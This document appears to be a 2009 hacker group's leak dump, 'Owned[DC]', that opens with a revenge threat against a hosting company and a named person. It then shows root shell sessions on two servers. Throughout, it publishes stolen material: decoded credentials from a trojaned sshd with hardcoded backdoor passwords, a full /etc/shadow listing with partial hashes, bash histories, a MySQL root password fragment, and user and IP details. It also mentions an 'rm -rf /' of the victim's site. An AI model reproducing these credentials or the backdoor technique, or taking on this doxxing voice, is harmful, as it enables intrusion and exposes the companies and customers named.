I will keep this short and simple, you hosted someone I want down and I decided to take down your company
and publish your customers information for that.
// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..
HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ
+----------------------------[ Owned ]----------------------------+
| Hack everyone you can and then hack some more |
| Owned[DC] v2 |
| _______ . _______ . _______ |
| Get in as anonymous, Leave with no trace. |
| |
+-----------------------------------------------------------------+
[ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]
08:24:44 up 519 days, 11:20, 3 users, load average: 0.05, 0.10, 0.09
makos2 pts/1 61.17.231.6 Fri Jun 26 08:12 still logged in
makos2 pts/3 61.17.231.6 Fri Jun 26 04:10 - 04:25 (00:15)
makos2 pts/7 61.17.231.6 Fri Jun 26 04:09 - 04:09 (00:00)
makos2 pts/5 61.17.231.6 Fri Jun 26 03:58 - 04:09 (00:11)
makos2 pts/4 61.17.231.6 Fri Jun 26 03:54 still logged in
wtmp begins Tue Jun 2 01:09:06 2009
Owned[DC]:[~]# date
Fri Jun 26 08:26:44 EDT 2009
Owned[DC]:[~]# uname -a
Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
Owned[DC]:[~]#
Owned[DC]:[~]# cd /var/run/ssh
Owned[DC]:[/var/run]# gcc -o decode decode.c
Owned[DC]:[/var/run]# ./decode ssh.old
HOOKOUT: 67.225.142.98 root:_censored_
HOOKIN: root:_censored_
HOOKOUT: 66.96.220.213 root:_censored_
.
.
.
HOOKIN: makos2:_censored_
HOOKOUT: 64.191.116.202 root:_censored_
Owned[DC]:[/var/run]# w
08:32:59 up 519 days, 11:28, 3 users, load average: 0.23, 0.22, 0.13
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
makos2 pts/0 61.17.231.6 03:53 3:54 0.13s 0.00s sshd: makos2 [priv]
makos2 pts/1 61.17.231.6 08:12 6.00s 0.06s 0.01s sshd: makos2 [priv]
makos2 pts/4 61.17.231.6 03:54 18:40 0.02s 0.01s sshd: makos2 [priv]
Owned[DC]:[/var/run]#
Owned[DC]:[/var/run]# cat /etc/shadow
root:_censored_:14418:0:99999:7:::
bin:*:13901:0:99999:7:::
daemon:*:13901:0:99999:7:::
adm:*:13901:0:99999:7:::
lp:*:13901:0:99999:7:::
sync:*:13901:0:99999:7:::
shutdown:*:13901:0:99999:7:::
halt:*:13901:0:99999:7:::
mail:*:13901:0:99999:7:::
news:*:13901:0:99999:7:::
uucp:*:13901:0:99999:7:::
operator:*:13901:0:99999:7:::
games:*:13901:0:99999:7:::
gopher:*:13901:0:99999:7:::
ftp:*:13901:0:99999:7:::
nobody:*:13901:0:99999:7:::
dbus:!!:13901:0:99999:7:::
vcsa:!!:13901:0:99999:7:::
rpm:!!:13901:0:99999:7:::
haldaemon:!!:13901:0:99999:7:::
netdump:!!:13901:0:99999:7:::
nscd:!!:13901:0:99999:7:::
sshd:!!:13901:0:99999:7:::
rpc:!!:13901:0:99999:7:::
mailnull:!!:13901:0:99999:7:::
smmsp:!!:13901:0:99999:7:::
pcap:!!:13901:0:99999:7:::
xfs:!!:13901:0:99999:7:::
pegasus:!!:13901:0:99999:7:::
mysql:!!:13901::::::
mailman:*:13901::::::
cpanel:*:13901::::::
systuser:!!:13901:0:99999:7:::
named:!!:13901::::::
clamav:!!:13901::::::
dorothy:_censored_:14126:0:99999:7:::
fileport:_censored_:13902:0:99999:7:::
icstune:_censored_:13902:0:99999:7:::
krisez:_censored_$LRTAc0.mSw4a72zaVSGJd0:13902:0:99999:7:::
kurwaun:_censored_$Y5V5WC30jDTB7h2HEuPWv0:13902:0:99999:7:::
makos:_censored_$6sPV/Yt2K90ah60vxrRE/.:14418:0:99999:7:::
makos2:_censored_$gUs1XceJmqOgEaHbeaQJN/:14418:0:99999:7:::
marcin:_censored_$CZjERtIuP0ob.TJhixQr5.:13902:0:99999:7:::
mdots:_censored_$JCyJyAL8iXQMeOQbF0jMo.:13902:0:99999:7:::
mklounge:_censored_$1Uw2zWBge5A2GLQqWS5Mn.:13902:0:99999:7:::
nashv:_censored_$h/475XUYdCfNl2N.mgPgV0:13902:0:99999:7:::
rogo:_censored_$6V878RKV1W/E4NPoGJHKu/:14192:0:99999:7:::
spanish:_censored_$h902kmWzyxUw1wwSMWWyp/:13902:0:99999:7:::
sprynet:_censored_$Zm2b8RGX0d8/qo5tSuJA3/:13902:0:99999:7:::
statewi:_censored_$EPK2zdk0Z9ET48XrRcsKJ1:14376:0:99999:7:::
tarocon:_censored_$6me2YVq3JQ0PeDFLV7Aml0:14073:0:99999:7:::
sprycha:_censored_$osQE8JvfI0lC/r464r1.30:13903:0:99999:7:::
hplounge:_censored_$59BBs5nOeFGPRO8hEj1F1.:13922:0:99999:7:::
cozy:_censored_$tj.rlOAmhdwJm6fdWPvv2.:13923:0:99999:7:::
cpanel-horde:*:13949::::::
cpanel-phpmyadmin:*:13949::::::
cpanel-phppgadmin:*:13949::::::
makospam:_censored_$9mTDWRT8N8NZ7hFUa.2Iv1:13962:0:99999:7:::
wiredbre:_censored_$jc6LduZz25ERlx0SSp6I8.:13980:0:99999:7:::
cybermun:_censored_$gSpGZJCyrf5eKoKXzoknb/:13984:0:99999:7:::
proto:_censored_$fuGMvBK.mAz7AO989Reqm/:14208:0:99999:7:::
tempecon:_censored_$M3wPHFn06YfnjqhpOoSis1:13995:0:99999:7:::
floralsi:_censored_$jboZSeeKKAecDPW7Xi8r01:13995:0:99999:7:::
serversh:_censored_$oh7hdFXLoQM7BtHaVIwDB0:13997:0:99999:7:::
simplify:_censored_$FRrjF78SYaCEyBK/zX9rU0:14025:0:99999:7:::
themunst:_censored_$YHtOc1ylvVbXQjSjCuMMS.:14017:0:99999:7:::
theregoe:_censored_$U1OUx/hznz7Z/cRxknMpV1:14019:0:99999:7:::
xbox360t:_censored_$52N4Y3wbF4I.j0xw0ybZv0:14027:0:99999:7:::
barbiedo:_censored_$dYASLs0QEHczZNK/xO4l60:14033:0:99999:7:::
c20q8anz:_censored_$5yj/Vw9bVQE1H8gFGnfwl0:14031:0:99999:7:::
bashingr:_censored_$40Rbu9u.CdR54/.QGx5hZ.:14034:0:99999:7:::
hawaiian:_censored_$YXD5Fqnc1wa47hXw5DS1z/:14036:0:99999:7:::
cnewyork:_censored_$auEIntz4K2naChQ6A8j42.:14035:0:99999:7:::
lasvegas:_censored_$O8g7FiIF7Z.G1BLakQhjl.:14035:0:99999:7:::
contourp:_censored_$Mhq3nTK4slo39beK7mAsV/:14036:0:99999:7:::
musiconl:_censored_$g.3Wk0K3xRAd8bzMfetZz0:14036:0:99999:7:::
jokesfor:_censored_$332BH8Z2tQ1.PoLUj0aeQ.:14036:0:99999:7:::
cpanelhorde:*:14037::::::
cpanelphpmyadmin:*:14037::::::
cpanelphppgadmin:*:14037::::::
cpanelroundcube:*:14037::::::
okcityco:_censored_$sRF34svAMlqkUvqPQyEXq/:14039:0:99999:7:::
pasadena:_censored_$IDwtddZgxQPTnlqIEiRd/.:14039:0:99999:7:::
ionsigns:_censored_$Vg7G3SaNWflS1zTsWy.b50:14292:0:99999:7:::
cherubim:_censored_$DIouDCIf0zrNJHJj1Hijy0:14042:0:99999:7:::
sanfranc:_censored_$G1VXarugAKLCe0mTh1mjz1:14042:0:99999:7:::
jillrace:_censored_$GWkRrIh91Slq3d4fP4Ysh/:14042:0:99999:7:::
portland:_censored_$9RiJMMNQaYXloc80zzyve/:14042:0:99999:7:::
newyorkc:_censored_$r/hkQYZAe3aMB2h72VDVE.:14042:0:99999:7:::
renoconc:_censored_$HreCJL6jaESpLR4GNQU2X0:14042:0:99999:7:::
indianap:_censored_$K69/LXuR2.0309THXC3IR1:14042:0:99999:7:::
lvconcer:_censored_$0SOI7NDDrTatWwv1qUtKw.:14042:0:99999:7:::
miamicon:_censored_$10LHNdaYHowHSELzvFlfW.:14042:0:99999:7:::
whatupla:_censored_$qBSgboCAfNT0K55szVNGv0:14322:0:99999:7:::
zconcert:_censored_$kj.cK7mz2sEam.1wusPIQ1:14042:0:99999:7:::
tokyocon:_censored_$bdBjHYHi4oSDqBsL/yHuS0:14042:0:99999:7:::
uhouston:_censored_$x/aaM4f.jxN1wMDYHnc/h.:14042:0:99999:7:::
raleigh:_censored_$tEFo7l/iuN.pRKxTSlCCe1:14042:0:99999:7:::
flagstaf:_censored_$mKfuTWqfxbt3X1ddt5fUK/:14042:0:99999:7:::
phoenixa:_censored_$5R9rVBeLzwZtIXTgSbfI9/:14042:0:99999:7:::
ap6mz0q2:_censored_$cfbHH6J9VN9UOr3KBZ9ts.:14042:0:99999:7:::
xq9s3ma:_censored_$vVfRtpDm4j1Uj08OcYmwG1:14044:0:99999:7:::
jacksonv:_censored_$yOc3XavkD3xVFrV/IyvKF.:14046:0:99999:7:::
exspry:_censored_$R/sFQOBW4EgGIThYQj28k.:14047:0:99999:7:::
exmako:_censored_$/YcknpKQlOCdzVzgWbJRM/:14048:0:99999:7:::
quagmire:_censored_$IrcWo57PYhw9lyNR8FlqR.:14049:0:99999:7:::
njmakos:_censored_$eLWUwH4sqaSjYNDDQD8uc.:14049:0:99999:7:::
vicscust:_censored_$zD1TjhIzUZXrqOlHSMKDv0:14220:0:99999:7:::
losangel:_censored_$ApXNU5tVAZvvTZ8wKhfrG0:14053:0:99999:7:::
newengla:_censored_$1inQwoEWSRR/mbuH/U8fj1:14053:0:99999:7:::
lvconven:_censored_$Pi1JPn.1OrKH5JaI5GjPf0:14055:0:99999:7:::
lvtrades:_censored_$dr.bC2FHXaV6QITM0lmbn1:14055:0:99999:7:::
nyctrade:_censored_$dAeNUEisO8nI1GxoDK7Bq0:14055:0:99999:7:::
services:_censored_$/MGwtjcf.Ru7o7y/HDd6P/:14068:0:99999:7:::
worships:_censored_$DD7lYOZiW2VfGQARqj4Nw/:14070:0:99999:7:::
eworship:_censored_$/RA2I.4drunr/Q5sEk/gA1:14070:0:99999:7:::
aemotors:_censored_$yHBjKMyrCFRYaGnSuAc420:14083:0:99999:7:::
workfrom:_censored_$8whIbBBBjYzZxgDDDuMde.:14091:0:99999:7:::
megaspel:_censored_$aO1t9Wneps4O6nDXFn.84/:14093:0:99999:7:::
espel:_censored_$PNoLG3/nFppUcjJB7Ndkc1:14093:0:99999:7:::
dyna:_censored_$oeAPTO2pNcYr7jguVfS.o0:14097:0:99999:7:::
niklas:_censored_$MLPe0p9S4Wz.ficqPiWE3.:14098:0:99999:7:::
glendale:_censored_$36WbIrHoaY6p.wQHDMKSI/:14112:0:99999:7:::
theworkf:_censored_$k9UTdl9Xszol3vXe8XJex/:14113:0:99999:7:::
missreso:_censored_$cMQPqmDGUCrI5GCTJ95IW1:14114:0:99999:7:::
theletro:_censored_$uSdV14r/ad2VSUSQN076J1:14137:0:99999:7:::
simobilg:_censored_$lgR0ZcRPsacgrXN0CyTph/:14163:0:99999:7:::
concert:_censored_$u78BVeFn/9dqijD5FxFn30:14167:0:99999:7:::
worldsbe:_censored_$KhYsNIhpV/9MpNLsJ7KkD1:14176:0:99999:7:::
x1qo0xmz:_censored_$35pb2Tt3NF7mcdwa8ij0S/:14210:0:99999:7:::
american:_censored_$f64FdDQZShu/QPCT01cig.:14212:0:99999:7:::
firstrat:_censored_$Cg447uD7Pf1PSfs03LyFI0:14217:0:99999:7:::
xq05vz73:_censored_$H96kS5lH6gbiK3ShSPwJG.:14219:0:99999:7:::
imsauto:_censored_$18x.Al7E/c8nKVG5w4ge90:14225:0:99999:7:::
headwayp:_censored_$5.CQnCYJzlFnw10dJB1fo/:14253:0:99999:7:::
performa:_censored_$RXFC0.Y9sd19TL59ulzBy0:14248:0:99999:7:::
snowboar:_censored_$S0pOHKtr37Qp283oBChtz0:14246:0:99999:7:::
importeu:_censored_$0vHEmwZW2WImMY8i961N7.:14260:0:99999:7:::
holyschn:_censored_$yyYCxFr6MAeXOFS4uGZxE1:14262:0:99999:7:::
rivercit:_censored_$JhMlSLJOJxGB84SdIX9VL0:14271:0:99999:7:::
perform:_censored_$MwABPul6js/dDkESj3NCa/:14334:0:99999:7:::
sco:_censored_$mD1J7V6/XgnGKexigg7ZQ/:14342:0:99999:7:::
austinar:_censored_$kwPledBlp5.5FRj7TCsXF.:14349:0:99999:7:::
arlingto:_censored_$HOPfqdVPLDjcKYOYXBssZ.:14350:0:99999:7:::
albuquer:_censored_$IIfpFNji/HFkgySU9QPyZ.:14350:0:99999:7:::
jvconcer:_censored_$Up603l0cXWF0BisBD010v/:14352:0:99999:7:::
sanjosec:_censored_$6lZMqhYCRgu07TQSTca1D.:14352:0:99999:7:::
sdconcer:_censored_$jsdhywYTV6.yqzfh7IApB1:14352:0:99999:7:::
bukemark:_censored_$giCqM37r16fagpVb.7SlB/:14363:0:99999:7:::
laconcer:_censored_$WBI4s4H3O7Slpsk7zrZpj.:14366:0:99999:7:::
dforce:_censored_$fjjNVrQw8LPQCDcgXRUkc1:14392:0:99999:7:::
Owned[DC]:[/backup]# cat ~/.bash_history
ssh 64.191.54.229 -l butts
#1244614734
ssh 64.191.54.229 -l butts
#1244651529
ssh butts@64.191.54.229
#1244644856
ssh 66.96.220.213 -l makosolutions
#1244644866
ssh 66.96.220.213 -l makosolutions -p 2222
#1244645088
ssh 66.96.220.213 -l mako -p 2222
#1244650823
top -c
#1244651468
ssh 66.96.220.213
#1244651606
ssh 66.96.220.213 -l makosolutions
#1244659374
ifconfig | grep 67.225.142.98
#1244659384
ssh -l butts server.holeinthewallhosting.com
#1244659474
nmap server.holeinthewallhosting.com
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l makosolutions 66.96.220.213
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l makosolutions 66.96.220.213 // infosec.org.uk
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1245184460
ssh 66.96.220.213
#1245199770
ssh -l makosolutions 66.96.220.213
#1245318670
vi /etc/csf/csf.denyip
#1245318687
ssh 66.96.220.213
#1245318707
ssh root@66.96.220.213
#1245318749
ssh mako@66.96.220.213 -p2222
#1245318770
ssh mako@66.96.220.213 -p 2222
#1245318842
ssh mako@66.96.220.213 -p2222
#1245316906
ssh 66.7.198.124
#1245317031
ssh 66.7.198.124
#1245317159
ssh 66.96.220.213
#1245318179
ssh 66.96.220.213
#1245319038
ssh 67.225.159.152
#1245319073
ssh 67.225.159.152 -p22
#1245319077
ssh 67.225.159.152 -p 22
.
.
.
csf -l | grep 66.96.211.181
#1245999632
apf
#1246000060
ssh 66.96.211.181 -l root
#1246000637
grep 66.96.211.181 /var/log/messages
#1246002631
cat /usr/local/psa/version
#1246002640
ls /usr/local/psa/version
#1246015247
ls /usr/local/psa/version
#1245998530
ssh 64.191.72.85
#1245998556
telnet 64.191.72.85 25
#1245998595
vzlist -a
#1246001328
ssh 64.191.72.85
Owned[DC]:[/backup]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda7 2.0G 426M 1.5G 23% /
/dev/sdb1 147G 61G 79G 44% /backup
/dev/sda1 1012M 46M 915M 5% /boot
none 2.0G 0 2.0G 0% /dev/shm
/dev/sda8 121G 32G 83G 28% /home
/dev/sda6 2.0G 37M 1.9G 2% /tmp
/dev/sda2 9.9G 5.6G 3.9G 60% /usr
/dev/sda5 9.9G 2.1G 7.3G 23% /var
/tmp 2.0G 37M 1.9G 2% /var/tmp
Owned[DC]:[/backup]#
Owned[DC]:[/etc/pam.d]# cat sshd
#%PAM-1.0
auth required pam_stack.so service=system-auth
auth required pam_nologin.so
account required pam_stack.so service=system-auth
password required pam_stack.so service=system-auth
session required pam_stack.so service=system-auth
session required pam_loginuid.so
auth required pam_shells.so
Owned[DC]:[/var/run]# hostname
puma.makosolutions.net
Owned[DC]:[/var/run]#
Owned[DC]:[~]# lsof -i TCP:22
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 17433 root 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd 17441 makos2 3u IPv6 791605626 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd 21409 root 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd 21412 makos2 3u IPv6 791273811 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd 26799 root 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
sshd 26806 makos2 3u IPv6 791290938 TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
ssh 26887 root 3u IPv4 791291132 TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
sshd 29596 root 3u IPv6 791533593 TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED)
// RoMeO logged in just before the rm -rf / of makosolutions.com
sshd 30850 root 3u IPv6 783032196 TCP *:ssh (LISTEN)
_______ _______ ________
\ _ \ ___ __\ _ \ / _____/
/ /_\ \\ \/ / /_\ \/ __ \
\ \_/ \> <\ \_/ \ |__\ \
\_____ /__/\_ \\_____ /\_____ /
\/ \/ \/ \/
.__ .__ .__ __ .__ .__ .__
| |__ ____ | | ____ |__| _____/ |_| |__ ______ _ _______ | | | |
| | \ / _ \| | _/ __ \| |/ \ __\ | \_/ __ \ \/ \/ /\__ \ | | | |
| Y ( <_> ) |_\ ___/| | | \ | | Y \ ___/\ / / __ \| |_| |__
|___| /\____/|____/\___ >__|___| /__| |___| /\___ >\/\_/ (____ /____/____/
\/ \/ \/ \/ \/ \/
.__ __ .__
| |__ ____ _______/ |_|__| ____ ____
| | \ / _ \/ ___/\ __\ |/ \ / ___\ ______
| Y ( <_> )___ \ | | | | | \/ /_/ > /_____/
|___| /\____/____ > |__| |__|___| /\___ /
\/ \/ \//_____/
__________ _________
\______ \_______ ____ / _____/ ____ ____
| ___/\_ __ \/ _ \\_____ \_/ __ \_/ ___\
| | | | \( <_> ) \ ___/\ \___
|____| |__| \____/_______ /\___ >\___ >
\/ \/ \/
64.191.54.229 0x3aownt:DlE46Y8KpH
+----------------------------[ Owned ]----------------------------+
| Hack everyone you can and then hack some more |
| Owned[DC] v2 |
| _______ . _______ . _______ |
| Get in as anonymous, Leave with no trace. |
| |
+-----------------------------------------------------------------+
[ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]
11:12:13 up 78 days, 17:02, 0 users, load average: 1.73, 2.17, 2.23
mrich pts/0 75-28-177-133.li Thu Jun 25 22:40 - 22:47 (00:06)
jayzer pts/1 cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49 (00:04)
fmystic pts/1 cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14 (00:46)
butts pts/0 puma.makosolutio Wed Jun 24 21:47 - 02:54 (05:07)
bwc05 pts/1 host-136-245.flt Wed Jun 24 00:18 - 00:18 (00:00)
wtmp begins Wed Apr 29 04:10:02 2009
root@server [~]#
root@server [~]# lsof -i -n | grep ssh
sshd 13173 root 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd 13176 hsp 3u IPv6 496962909 TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd 13285 root 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd 13287 stephenm 3u IPv6 496964091 TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd 13287 stephenm 7u IPv4 505107114 TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
sshd 13287 stephenm 8u IPv4 505106277 TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
sshd 30096 root 3u IPv6 485663697 TCP *:ssh (LISTEN)
root@server [~]#
root@server [/var/run]# gcc -o decode decode.c
&#847;&#1030;&#693;root@server [/var/run]# ./decode ssh.old
HOOKIN: falados:$.lWKq._censored_
HOOKIN: smithah:_censored_
.
.
.
HOOKIN: karsh:vnm_censored_
HOOKIN: karsh:vnm_censored_
HOOKIN: smithah:Coverfir_censored_
HOOKIN: karsh:vn_censored_
HOOKIN: mrich:t23_censored_
root@server [/var/run]#
root@server [/var/run]# hostname
server.holeinthewallhosting.net
root@server [/var/run]# uname -a
Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
root@server [/var/run]# date
Fri Jun 26 11:16:32 CDT 2009
root@server [/var/run]# ifconfig -a
eth0 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.229 Bcast:64.191.54.239 Mask:255.255.255.240
inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:587506583 (560.2 MiB) TX bytes:4170982921 (3.8 GiB)
Interrupt:217 Base address:0x2000
eth0:1 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.230 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:2 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.231 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:3 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.232 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:4 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.54.233 Bcast:64.191.54.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:5 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.197 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:6 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.198 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:7 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.199 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:8 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.200 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:9 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.201 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:10 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.202 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:11 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.203 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:12 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.204 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:13 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.205 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth0:14 Link encap:Ethernet HWaddr 00:19:D1:FB:45:9B
inet addr:64.191.36.206 Bcast:64.191.36.207 Mask:255.255.255.240
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
Interrupt:217 Base address:0x2000
eth1 Link encap:Ethernet HWaddr 00:50:04:6F:DA:43
BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:217 Base address:0x8000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1453567506 (1.3 GiB) TX bytes:1453567506 (1.3 GiB)
sit0 Link encap:IPv6-in-IPv4
NOARP MTU:1480 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
root@server [/var/run]#
root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
Rhosts authentication refused for %.100s: bad modes for %.200s
Server has been configured to ignore %.100s.
Accepted host %s ip %s client_user %s server_user %s
HOOKIN: %s:%s
DlE46Y8KpH
root@server [/var/run]#
root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
check_key_in_hostfiles: key %s for %s
auth1.c
sending challenge '%s'
ruser %.100s
do_authloop: BN_new failed
0x3aownt
root@server [~]# cat .my.cnf
[client]
user="root"
pass=",a5.z_censored_"
root@server [~]#
root@server [/tmp]# cd /var/run/
root@server [/var/run]# ls
./ couriersslcache dbus/ mdmpd/ pm/ saslauthd/ tailwatchd.pid
../ cpanellogd.pid eximstats/ messagebus.pid pop3d.pid screen/ upcp.pid
acpid.socket= cpdavd.pid ftpd.sock= named/ pop3d.pid.lock sdp= utmp
audispd_events= cphulkd_detector.pid haldaemon.pid named.pid@ pop3d-ssl.pid setrans/ winbindd/
auditd.pid cphulkd_processor.pid imapd.pid netreport/ pop3d-ssl.pid.lock setroubleshoot/ wpa_supplicant/
autofs.fifo-misc| cphulkd.sock= imapd.pid.lock NetworkManager/ ppp/ spamd.pid
autofs.fifo-net| cpsrvd.pid imapd-ssl.pid nscd/ pure-authd.pid sshd.pid
avahi-daemon/ crond.pid imapd-ssl.pid.lock pcscd.comm= pure-ftpd/ ssh.old
chkservd/ cups/ klogd.pid pcscd.pid pure-ftpd.pid sudo/
console/ cupsd.pid mdadm/ pcscd.pub rpc.statd.pid syslogd.pid
root@server [/var/run]# cd screen/
root@server [/var/run/screen]# ls
./ ../ S-root/
root@server [/var/run/screen]# cd S-root/
root@server [/var/run/screen/S-root]# ls
./ ../ 13472.pts-0.server|
root@server [/var/run/screen/S-root]# cat 13472.pts-0.server
root@server [/var/run/screen/S-root]# ls
./ ../ 13472.pts-0.server|
root@server [/var/run/screen/S-root]# cd ..
root@server [/var/run/screen]# ls
./ ../ S-root/
root@server [/var/run/screen]# ps -aux | grep -r screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
